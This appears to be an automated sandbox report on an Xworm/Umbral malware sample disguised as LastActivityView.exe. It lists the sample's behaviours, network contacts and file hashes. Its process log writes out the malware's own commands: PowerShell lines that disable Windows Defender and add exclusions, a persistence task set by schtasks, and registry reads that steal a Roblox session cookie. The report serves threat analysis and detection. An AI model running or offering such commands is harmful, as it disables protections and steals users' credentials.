Analysis Overview
SHA256
6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
Threat Level: Known bad
The file LastActivityView.exe was found to be: Known bad.
Malicious Activity Summary
Xworm family
Detect Umbral payload
Xworm
Umbral
Detect Xworm Payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Enumerates physical storage devices
Unsigned PE
Runs ping.exe
Detects videocard installed
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-06 23:34
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-06 23:34
Reported
2024-05-06 23:37
Platform
win10-20240404-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\syjcie.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syjcie.exe | N/A |
| N/A | N/A | C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe | N/A |
| N/A | N/A | C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052 = "C:\\ProgramData\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe" | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe
"C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LastActivityView.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052" /tr "C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe"
C:\Users\Admin\AppData\Local\Temp\syjcie.exe
"C:\Users\Admin\AppData\Local\Temp\syjcie.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\syjcie.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\syjcie.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\syjcie.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 52.28.112.211:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 211.112.28.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 52.28.112.211:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.201.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 82.139.121.3.in-addr.arpa | udp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 3.127.253.86:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
| DE | 3.127.253.86:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.127.253.86:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.127.253.86:19380 | 4.tcp.eu.ngrok.io | tcp |
Files
memory/1448-0-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp
memory/1448-1-0x0000000000AD0000-0x0000000000AEC000-memory.dmp
memory/1448-2-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/96-7-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/96-9-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/96-8-0x00000228EE320000-0x00000228EE342000-memory.dmp
memory/96-12-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/96-13-0x00000228EE4D0000-0x00000228EE546000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqrkwlfb.uup.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/96-51-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 03c0e5299730d7840dc4ee907c2d7e2a |
| SHA1 | ad7731702af04363af05807bdcd034e87073ced2 |
| SHA256 | f3a484a2fb1e7e859c6d7950be2ebecd667e3f42c244afed7dd2b4477e83861b |
| SHA512 | 216c32835ba4024985460655c94aee41873285a7ef8b37a88970a552760cd2fd66fef02b594a3ed921433208a275d13421cfdf45bd554123f20c2ab58c2340e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 12bcbfc36299cc2f49f07e4c89e87029 |
| SHA1 | 3bb2528216e4d71ec44c57398111d40ab3b75bc7 |
| SHA256 | ef41ffde899433aaedb44745f4d43e1a486cd383c5b662f9c9279ee249335dad |
| SHA512 | 1ac4211fc339564cb2cb15e990bf3b8f5c7bace629a3f65444f526bf31c9b541bba0c65ac30145c67bac998fa3656b02b154fa9516a323271363e00b28fc68a7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a4974291e85a04444b7be80b193c8a99 |
| SHA1 | 4322a84e7b2207c02ba3fe6acf1e7ee295c8eba9 |
| SHA256 | e733390b57c1f323c7349bb6a65e8f4fe0b5b815f40a92897d4f44ac1c9ca871 |
| SHA512 | 35f8976633cbf917dc2609272fc981c736b42371ff1438ce178eb4d42b22bdf6a8aa542d620c6a201d3d7fb6dfbe10f110c5411bf44f2ee6f1cda1a151dc7ba5 |
memory/1448-186-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp
memory/1448-187-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/1448-188-0x000000001B7D0000-0x000000001B7DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\syjcie.exe
| MD5 | f94e3703ca371767d93f5a88b74fbee7 |
| SHA1 | 80530e8ffb3fc7d2c36e339b70bcae0d0014b7f5 |
| SHA256 | 954af7a9095306263dce0c4d05eda925de49041ad6ea7c37a23fed8cbc97f1d7 |
| SHA512 | ca0ba2f5a26a26eeb0e15a5b99be937b7d695411f043b1629ef10f7106f26a1096229f763b0ab86796d8f37efc62f469e399206d7a8c706e4043112269f01066 |
memory/4668-194-0x0000016E260D0000-0x0000016E26110000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5477d94aecd44c4e5c1463c1c0847589 |
| SHA1 | 3f3c4f3a75229d0eccaf568c85697060f41bae9a |
| SHA256 | d8ea4c44242969f01dd40441b010d844747fec463c229b13c2836854cf7ccfc1 |
| SHA512 | 2bba1edfdc34af16f01d8fdb4c2730ad577a219721b6c8241088ce517334a7309d8d6d246f98851d73b1eeee40a6535ecdd41d517b9b0d207cf5e11762f12375 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 01b8d3a45328a2dff7f64c4bb9747dec |
| SHA1 | c33eb4823a32745cdccadb81d34ae9b325ab39c8 |
| SHA256 | 1425ed0a9cccab81ef6493ce8efe445e84e0d8567d8e0f640721c5cc79ac7697 |
| SHA512 | 201f208f52f1eb60ab221da7fef4a7988612123d865eb02cb989073458571785e4e4ece44b2ac95268e177482bdf05c6e435136aee7d71fe0fbb048ef2fcf899 |
memory/4668-269-0x0000016E27E60000-0x0000016E27EB0000-memory.dmp
memory/4668-270-0x0000016E27E30000-0x0000016E27E4E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5efef7b8b6534cf61adc5a223225b92f |
| SHA1 | 21c44e23f5b504a2c89e081fd6464bc68007ed0a |
| SHA256 | ceb1979a91fa6d97a1ebb6162d01f30d9b9527d1ba93e9dc60165cbfd3d98886 |
| SHA512 | efc60add9ea6f0f08f824d4a3d5413b8cd50f25274687fdfa466699ab49ac4504005e5b130d2149319960c636ff748e2d1f805bae168d3ef517a84bda7c2e9b7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 640e1e8914a9e4045d7c9331510cd65e |
| SHA1 | 20dbf3777f4ec696c45304b7e8b1f4ea62bcd9b8 |
| SHA256 | 3d90b754303986173f9e70e82f3d71c453cc3dd8c9effc766bf55004909078d8 |
| SHA512 | 373d84331d97e407a6ce56bae77231b15a1747c9839a27932715c2b9f81cacc41091e9d735faf0df9f228d851be402691dbeb5cf1b5807c075f996d43a723690 |
memory/4668-334-0x0000016E27E50000-0x0000016E27E5A000-memory.dmp
memory/4668-335-0x0000016E40620000-0x0000016E40632000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 73af5a2e56e321b85f04f1c431f760ea |
| SHA1 | 4ffd2aecfe9163cebacf508be261133262d675f9 |
| SHA256 | 5d53260071efea7c61647a6be8c386cd9d4651f92a5d4bd7b0ac8dc72a8f85eb |
| SHA512 | 0926185823796cc35b263ded5e30d92525453945df09bc34c1dee646d637deded9d6e15a750748f2948ddce4714f17a64da9899fda14f0feb8746b87428ec8b2 |
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
| MD5 | 499e35df562563babfff6a1d2ee71743 |
| SHA1 | 7bece5115d9df1fa43b6a7a69f9574a498388960 |
| SHA256 | 6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b |
| SHA512 | 2df1934de1f45661ab929a7f7658478f5a3d8cacfbe682f1f6b8bee8a49ab2720141a1c0ea74608e14002ff5132cb0932c7fb5b3790575b5e23c5327adfdf377 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe.log
| MD5 | 16c5fce5f7230eea11598ec11ed42862 |
| SHA1 | 75392d4824706090f5e8907eee1059349c927600 |
| SHA256 | 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151 |
| SHA512 | 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc |